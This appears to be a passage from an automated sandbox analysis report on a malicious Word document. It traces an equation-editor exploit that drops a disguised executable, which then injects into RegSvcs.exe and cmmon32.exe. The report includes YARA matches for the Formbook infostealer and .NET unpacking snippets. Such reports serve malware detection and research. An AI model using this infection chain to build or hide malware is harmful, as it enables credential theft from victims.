      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0090F8EE8_2_0090F8EE
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0087C85C8_2_0087C85C
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0089286D8_2_0089286D
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0091098E8_2_0091098E
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_008729B28_2_008729B2
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_008869FE8_2_008869FE
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_008F394B8_2_008F394B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_008F59558_2_008F5955
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00923A838_2_00923A83
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0091CBA48_2_0091CBA4
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_008FDBDA8_2_008FDBDA
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00897B008_2_00897B00
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0090FDDD8_2_0090FDDD
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_008A0D3B8_2_008A0D3B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0087CD5B8_2_0087CD5B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_008A2E2F8_2_008A2E2F
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0088EE4C8_2_0088EE4C
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0090CFB18_2_0090CFB1
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_008E2FDC8_2_008E2FDC
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00880F3F8_2_00880F3F
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0089DF7C8_2_0089DF7C
      Source: ~WRF{62062233-A800-4889-8BD5-74F0FF85D95C}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
      Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: mozglue.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: winsqlite3.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77620000 page execute and read and writeJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77740000 page execute and read and writeJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\cmmon32.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\cmmon32.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
      Source: 0000000A.00000002.1293431078.00000000001F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 0000000A.00000002.1293431078.00000000001F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000A.00000002.1293431078.00000000001F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000A.00000002.1293276681.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 0000000A.00000002.1293276681.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000A.00000002.1293276681.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000B.00000002.1114237135.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 0000000B.00000002.1114237135.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000B.00000002.1114237135.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000A.00000002.1293480956.0000000000220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 0000000A.00000002.1293480956.0000000000220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000A.00000002.1293480956.0000000000220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000009.00000002.1305552060.000000000B328000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
      Source: 00000007.00000002.1038091182.0000000012B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000007.00000002.1038091182.0000000012B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000007.00000002.1038091182.0000000012B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000008.00000002.1056144185.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000008.00000002.1056144185.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000008.00000002.1056144185.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: Process Memory Space: cleanmgr_settings.exe PID: 3332, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: Process Memory Space: RegSvcs.exe PID: 3388, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: Process Memory Space: cmmon32.exe PID: 3440, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\wewewewewewewewew##################ewewewewewewe[1].doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\74697CD7.doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 008DF970 appears 84 times
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0086E2A8 appears 38 times
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 008B373B appears 245 times
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 008B3F92 appears 132 times
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0086DF5C appears 121 times
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_008600C4 NtCreateFile,LdrInitializeThunk,8_2_008600C4
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00860048 NtProtectVirtualMemory,LdrInitializeThunk,8_2_00860048
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00860078 NtResumeThread,LdrInitializeThunk,8_2_00860078
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0085F9F0 NtClose,LdrInitializeThunk,8_2_0085F9F0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0085F900 NtReadFile,LdrInitializeThunk,8_2_0085F900
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0085FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_0085FAD0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0085FAE8 NtQueryInformationProcess,LdrInitializeThunk,8_2_0085FAE8
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0085FBB8 NtQueryInformationToken,LdrInitializeThunk,8_2_0085FBB8
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0085FB68 NtFreeVirtualMemory,LdrInitializeThunk,8_2_0085FB68
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0085FC90 NtUnmapViewOfSection,LdrInitializeThunk,8_2_0085FC90
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0085FC60 NtMapViewOfSection,LdrInitializeThunk,8_2_0085FC60
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0085FD8C NtDelayExecution,LdrInitializeThunk,8_2_0085FD8C
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0085FDC0 NtQuerySystemInformation,LdrInitializeThunk,8_2_0085FDC0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0085FEA0 NtReadVirtualMemory,LdrInitializeThunk,8_2_0085FEA0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0085FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,8_2_0085FED0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0085FFB4 NtCreateSection,LdrInitializeThunk,8_2_0085FFB4
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_008610D0 NtOpenProcessToken,8_2_008610D0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00860060 NtQuerySection,8_2_00860060
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_008601D4 NtSetValueKey,8_2_008601D4
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0086010C NtOpenDirectoryObject,8_2_0086010C
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00861148 NtOpenThread,8_2_00861148
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_008607AC NtCreateMutant,8_2_008607AC
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0085F8CC NtWaitForSingleObject,8_2_0085F8CC
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00861930 NtSetContextThread,8_2_00861930
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0085F938 NtWriteFile,8_2_0085F938
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0085FAB8 NtQueryValueKey,8_2_0085FAB8
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0085FA20 NtQueryInformationFile,8_2_0085FA20
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0085FA50 NtEnumerateValueKey,8_2_0085FA50
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0085FBE8 NtQueryVirtualMemory,8_2_0085FBE8
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0085FB50 NtCreateKey,8_2_0085FB50
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0085FC30 NtOpenProcess,8_2_0085FC30
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00860C40 NtGetContextThread,8_2_00860C40
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0085FC48 NtSetInformationFile,8_2_0085FC48
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00861D80 NtSuspendThread,8_2_00861D80
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0085FD5C NtEnumerateKey,8_2_0085FD5C
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0085FE24 NtWriteVirtualMemory,8_2_0085FE24
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0085FFFC NtCreateProcessEx,8_2_0085FFFC
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0085FF34 NtQueueApcThread,8_2_0085FF34
      Source: C:\Windows\SysWOW64\cmmon32.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install DirectoryJump to behavior
      Source: cleanmgr[1].exe.5.drStatic PE information: No import functions for PE file found
      Source: cleanmgr_settings.exe.5.drStatic PE information: No import functions for PE file found
      Source: cleanmgr[1].exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: cleanmgr_settings.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: Payment_document.docx.LNK.0.drLNK file: ..\..\..\..\..\Desktop\Payment_document.docx.doc
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$yment_document.docx.docJump to behavior
      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOC@10/29@22/6
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: explorer.exe, 00000009.00000000.1039427835.0000000003B10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: .VBPud<_
      Source: ~WRF{62062233-A800-4889-8BD5-74F0FF85D95C}.tmp.0.drOLE document summary: title field not present or empty
      Source: ~WRF{62062233-A800-4889-8BD5-74F0FF85D95C}.tmp.0.drOLE document summary: author field not present or empty
      Source: ~WRF{62062233-A800-4889-8BD5-74F0FF85D95C}.tmp.0.drOLE document summary: edited time not present or 0
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\cleanmgr_settings.exe "C:\Users\Public\cleanmgr_settings.exe"
      Source: C:\Users\Public\cleanmgr_settings.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regsvcs.exe
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
      Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe C:\Program Files (x86)\Mozilla Firefox\Firefox.exe
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\cleanmgr_settings.exe "C:\Users\Public\cleanmgr_settings.exe" Jump to behavior
      Source: C:\Users\Public\cleanmgr_settings.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regsvcs.exeJump to behavior
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exeJump to behavior
      Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe C:\Program Files (x86)\Mozilla Firefox\Firefox.exeJump to behavior
      Source: C:\Windows\SysWOW64\cmmon32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR5AA.tmpJump to behavior
      Source: C:\Users\Public\cleanmgr_settings.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\f89061884b75dab0e3967d7221e5290d\mscorlib.ni.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmmon32.exeFile written: C:\Users\user\AppData\Roaming\4163BP8B\416logrc.iniJump to behavior
      Source: cleanmgr[1].exe.5.dr, IeaukREKDqU6i5HIfJ/s8lFJHoDc5xtaurZwu.csCryptographic APIs: 'CreateDecryptor'
      Source: cleanmgr[1].exe.5.dr, IeaukREKDqU6i5HIfJ/s8lFJHoDc5xtaurZwu.csCryptographic APIs: 'CreateDecryptor'
      Source: cleanmgr_settings.exe.5.dr, IeaukREKDqU6i5HIfJ/s8lFJHoDc5xtaurZwu.csCryptographic APIs: 'CreateDecryptor'
      Source: cleanmgr_settings.exe.5.dr, IeaukREKDqU6i5HIfJ/s8lFJHoDc5xtaurZwu.csCryptographic APIs: 'CreateDecryptor'
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: Payment_document.docx.docInitial sample: OLE zip file path = word/_rels/settings.xml.rels
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: Binary string: VECTOR.pdb source: cleanmgr_settings.exe, 00000007.00000002.1034841653.0000000000150000.00000004.08000000.00040000.00000000.sdmp
      Source: Binary string: VECTOR.pdbH source: cleanmgr_settings.exe, 00000007.00000002.1034841653.0000000000150000.00000004.08000000.00040000.00000000.sdmp
      Source: Binary string: cmmon32.pdb source: RegSvcs.exe, 00000008.00000002.1056252554.0000000000270000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1056869423.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 0000000A.00000002.1293719178.0000000000860000.00000040.80000000.00040000.00000000.sdmp
      Source: Binary string: cmmon32.pdbr2v source: RegSvcs.exe, 00000008.00000002.1056252554.0000000000270000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1056869423.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 0000000A.00000002.1293719178.0000000000860000.00000040.80000000.00040000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000008.00000002.1056971464.0000000000850000.00000040.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000003.1035741352.00000000006C0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000003.1034770754.0000000000430000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 0000000A.00000002.1293756599.0000000002120000.00000040.00001000.00020000.00000000.sdmp
      Source: Binary string: JJnnN877.pdb source: cleanmgr_settings.exe
      Source: Binary string: RegSvcs.pdb source: cmmon32.exe, 0000000A.00000002.1293597036.0000000000610000.00000004.00000020.00020000.00000000.sdmp
      Source: ~WRF{62062233-A800-4889-8BD5-74F0FF85D95C}.tmp.0.drInitial sample: OLE indicators vbamacros = False

      Data Obfuscation

      barindex
      .NET source code contains potential unpacker
      Source: cleanmgr[1].exe.5.dr, if9wU0MdImxshGFH0r/x3k9ishGlBA0BwYpmu.cs.Net Code: sgQDiOA5k System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: cleanmgr_settings.exe.5.dr, if9wU0MdImxshGFH0r/x3k9ishGlBA0BwYpmu.cs.Net Code: sgQDiOA5k System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      .NET source code contains method to dynamically call methods (often used by packers)
      Source: cleanmgr[1].exe.5.dr, IeaukREKDqU6i5HIfJ/s8lFJHoDc5xtaurZwu.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
      Source: cleanmgr_settings.exe.5.dr, IeaukREKDqU6i5HIfJ/s8lFJHoDc5xtaurZwu.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
      Source: C:\Users\Public\cleanmgr_settings.exeCode function: 7_2_000007FE88C705C0 push eax; ret 7_2_000007FE88C705C9
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0086DFA1 push ecx; ret 8_2_0086DFB4
